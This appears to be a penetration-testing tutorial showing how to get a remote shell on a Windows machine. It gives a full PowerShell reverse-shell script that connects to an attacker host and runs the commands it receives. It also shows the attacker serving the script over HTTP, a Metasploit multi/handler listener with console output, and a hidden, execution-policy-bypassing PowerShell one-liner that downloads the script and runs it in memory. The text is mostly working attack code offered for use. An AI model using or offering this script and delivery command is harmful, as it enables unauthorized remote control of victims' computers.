Below is the PowerShell script:
$client = New-Object System.Net.Sockets.TCPClient('10.10.50.101',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close() $sm=(New-Object Net.Sockets.TCPClient('10.10.50.101',4444)).GetStream();[byte[]]$bt=0..65535|%{0};while(($i=$sm.Read($bt,0,$bt.Length)) -ne 0){;$d=(New-Object Text.ASCIIEncoding).GetString($bt,0,$i);$st=([text.encoding]::ASCII).GetBytes((iex $d 2>&1));$sm.Write($st,0,$st.Length)}
We name the script "reverse.ps1" and put this script in a directory and host the file utilizing python:
root@kali:~/shell# ls reverse.ps1 root@kali:~/shell# python -m SimpleHTTPServer 8000 Serving HTTP on 0.0.0.0 port 8000 ...
We then set up our Metasploit multi/handler:
root@kali:~/shell# msfconsole ______________________________________________________________________________ | | | 3Kom SuperHack II Logon | |______________________________________________________________________________| | | | | | | | User Name: [ security ] | | | | Password: [ ] | | | | | | | | [ OK ] | |______________________________________________________________________________| | | | https://metasploit.com | |______________________________________________________________________________| =[ metasploit v4.17.21-dev ] + -- --=[ 1822 exploits - 1033 auxiliary - 316 post ] + -- --=[ 539 payloads - 42 encoders - 10 nops ] + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ] msf > use exploit/multi/handler msf exploit(multi/handler) > set payload windows/shell/reverse_tcp payload => windows/shell/reverse_tcp msf exploit(multi/handler) > set LHOST 10.10.50.101 LHOST => 10.10.50.101 msf exploit(multi/handler) > options Module options (exploit/multi/handler): Name Current Setting Required Description ---- --------------- -------- ----------- Payload options (windows/shell/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) LHOST 10.10.50.101 yes The listen address (an interface may be specified) LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Wildcard Target msf exploit(multi/handler) > set ExitOnSession false ExitOnSession => false msf exploit(multi/handler) > exploit -j [*] Exploit running as background job 0. [*] Started reverse TCP handler on 10.10.50.101:4444 msf exploit(multi/handler) >
Now, with our payload being hosted and our listener ready, we deliver our exploit.
The below calls PowerShell with the execution policy being set to bypass. It also will close the window upon execution. We download our PowerShell script and run it.
powershell.exe -executionpolicy bypass -w hidden "iex(New-Object System.Net.WebClient).DownloadString('http://10.10.50.101:8000/reverse.ps1'); reverse.ps1"
Below is what our victim looks like before execution:
Here's a screenshot of our listener:
We can then easily background our shell and wait for more connections from other systems.
Hope this has been helpful!